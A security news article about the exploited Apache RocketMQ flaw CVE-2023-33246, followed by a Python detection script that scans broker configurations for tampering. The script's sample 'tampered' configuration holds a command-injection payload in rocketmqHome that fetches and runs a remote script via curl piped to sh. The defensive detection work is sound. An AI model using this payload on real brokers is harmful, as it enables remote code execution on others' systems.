Hidden threat: Apache RocketMQ and a vulnerability that even Shodan can't see

CISA has added a vulnerability to its catalog that cannot be ignored.

The US Cybersecurity and Infrastructure Security Agency (CISA) has added the critical vulnerability CVE-2023-33246 (CVSS 9.8) in Apache RocketMQ to its Known Exploited Vulnerabilities (KEV) catalog.

Several Apache RocketMQ components, including the NameServer, Broker, and Controller, can end up exposed to the Internet and perform no permission checks on incoming requests. An attacker can exploit this to execute arbitrary commands as the system user under which RocketMQ runs, either through the configuration update function or by forging the contents of RocketMQ protocol messages.

The vulnerability affects RocketMQ 5.x releases from 5.0.0 through 5.1.0 and 4.x releases prior to 4.9.6. Users of RocketMQ 5.x are advised to upgrade to 5.1.1 or later; users of RocketMQ 4.x to 4.9.6 or later.

Apache's advisory was published in May 2023, but CISA added the issue to KEV only after the security company VulnCheck published technical details of the vulnerability. According to the VulnCheck report, CVE-2023-33246 allows a remote, unauthenticated attacker to update the RocketMQ broker configuration and thereby achieve command injection. VulnCheck notes that in-the-wild exploitation has been ongoing since June 2023.

The researchers note that the vulnerability is exploited through RocketMQ's own remoting protocol, spoken on the broker ports (10909 and 10911 by default). Neither Shodan nor Censys fingerprints this protocol, which makes it difficult to determine the actual number of vulnerable systems.

The researchers have linked CVE-2023-33246 to only one botnet so far, but believe that at least several attackers are actively exploiting the flaw in the wild. They recommend removing RocketMQ instances from the Internet and checking the broker configuration for signs of exploitation. CISA has directed federal agencies to remediate the vulnerability by September 27, 2023.
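The recommended check of the broker configuration can be scripted. The following is an added example, not code from the article, from VulnCheck, or from the RocketMQ project. It reads key=value text in the shape of broker.conf or the output of `mqadmin getBrokerConfig` and flags values that look like a planted payload. The indicator rules are assumptions drawn from public analysis of the exploit chain (an unauthenticated configuration update that puts a shell payload into rocketmqHome and enables filter-server processes so the broker executes it), so treat them as a starting point rather than a complete signature; the sample configurations and the 198.51.100.7 address are constructed for the example.

```python
"""Scan a RocketMQ broker configuration dump for signs of CVE-2023-33246 abuse.

Added example, not code from the article or the RocketMQ project. Input is
key=value text as written in broker.conf or printed by `mqadmin getBrokerConfig`.
The indicator rules are assumptions drawn from public analysis of the exploit
chain, not from the article above.
"""
import re
from dataclasses import dataclass

# Characters that have no business inside a broker path or numeric setting.
SHELL_META = re.compile(r"[;|&`$<>(){}]")
# namesrvAddr legitimately uses ';' as a list separator, so it gets its own rule.
NAMESRV_LIST = re.compile(r"^[A-Za-z0-9.\-]+:\d{1,5}(;[A-Za-z0-9.\-]+:\d{1,5})*$")


@dataclass
class Finding:
    key: str
    value: str
    reason: str


def parse_broker_config(text: str) -> dict:
    """Parse Java-properties-style key=value lines into a dict (assumed input format)."""
    cfg = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#!" or "=" not in line:
            continue
        key, _, value = line.partition("=")
        cfg[key.strip()] = value.strip()
    return cfg


def scan_broker_config(cfg: dict) -> list:
    """Return a list of Findings; an empty list means no indicator matched."""
    findings = []

    # rocketmqHome is spliced into a shell command line by the broker, so anything
    # other than a plain absolute path is suspicious.
    home = cfg.get("rocketmqHome", "")
    if home and (SHELL_META.search(home) or not home.startswith("/")):
        findings.append(Finding("rocketmqHome", home,
                                "not a plain absolute path; the broker uses it to build a shell command"))

    # A non-zero filterServerNums makes the broker spawn filter-server processes
    # through the shell, which is what turns a planted rocketmqHome into execution.
    fs = cfg.get("filterServerNums", "0")
    if not fs.isdigit() or int(fs) > 0:
        findings.append(Finding("filterServerNums", fs,
                                "non-zero value makes the broker start filter-server processes via the shell"))

    # namesrvAddr may contain ';' as a separator, so validate it as a host:port list
    # instead of applying the generic metacharacter rule.
    addr = cfg.get("namesrvAddr")
    if addr is not None and not NAMESRV_LIST.match(addr):
        findings.append(Finding("namesrvAddr", addr, "not a host:port list"))

    for key, value in cfg.items():
        if key in ("rocketmqHome", "filterServerNums", "namesrvAddr"):
            continue
        if SHELL_META.search(value):
            findings.append(Finding(key, value, "shell metacharacters in a config value"))
    return findings


def scan_text(text: str) -> list:
    """Convenience wrapper: parse then scan."""
    return scan_broker_config(parse_broker_config(text))


# Constructed sample configs: one as an operator would write it, one after an
# attacker's configuration update (payload shape follows publicly reported cases;
# the address is a TEST-NET placeholder).
CLEAN_CONFIG = """\
brokerClusterName=DefaultCluster
brokerName=broker-a
brokerId=0
namesrvAddr=10.0.0.5:9876;10.0.0.6:9876
rocketmqHome=/opt/rocketmq-4.9.5
filterServerNums=0
"""

TAMPERED_CONFIG = """\
brokerClusterName=DefaultCluster
brokerName=broker-a
brokerId=0
namesrvAddr=10.0.0.5:9876;10.0.0.6:9876
rocketmqHome=-c $@|sh . echo curl http://198.51.100.7/x.sh|sh;
filterServerNums=1
"""


if __name__ == "__main__":
    for label, text in (("clean", CLEAN_CONFIG), ("tampered", TAMPERED_CONFIG)):
        hits = scan_text(text)
        print(f"{label}: {len(hits)} indicator(s)")
        for f in hits:
            print(f"  {f.key}={f.value!r}: {f.reason}")
```

Run it against a dump from each broker; a hit on rocketmqHome or filterServerNums on a host that was reachable from the Internet should be treated as a likely compromise, not just a misconfiguration, since a legitimate operator has no reason to set either value over the remoting protocol. The separate rule for namesrvAddr exists because its legitimate `;`-separated list would otherwise trip the generic metacharacter check.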